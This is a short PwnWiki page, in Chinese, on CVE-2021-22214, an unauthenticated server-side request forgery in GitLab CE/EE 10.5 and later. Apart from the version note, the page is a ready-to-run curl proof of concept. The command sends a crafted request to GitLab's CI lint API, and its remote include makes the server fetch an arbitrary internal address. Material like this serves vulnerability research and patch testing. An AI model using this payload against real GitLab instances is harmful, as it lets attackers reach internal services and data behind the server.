CVE-2021-22214 GitLab前台SSRF漏洞

From PwnWiki
Other languages:
Chinese • ‎中文(台灣)‎

漏洞影響

GitLab CE/EE >=10.5

POC

curl -s --show-error -H 'Content-Type: application/json' https://example.gitlab.com/api/v4/ci/lint --data '{ "include_merged_yaml": true, "content": "include:\n  remote: http://<ip>:<port>/api/v1/targets?test.yml"}'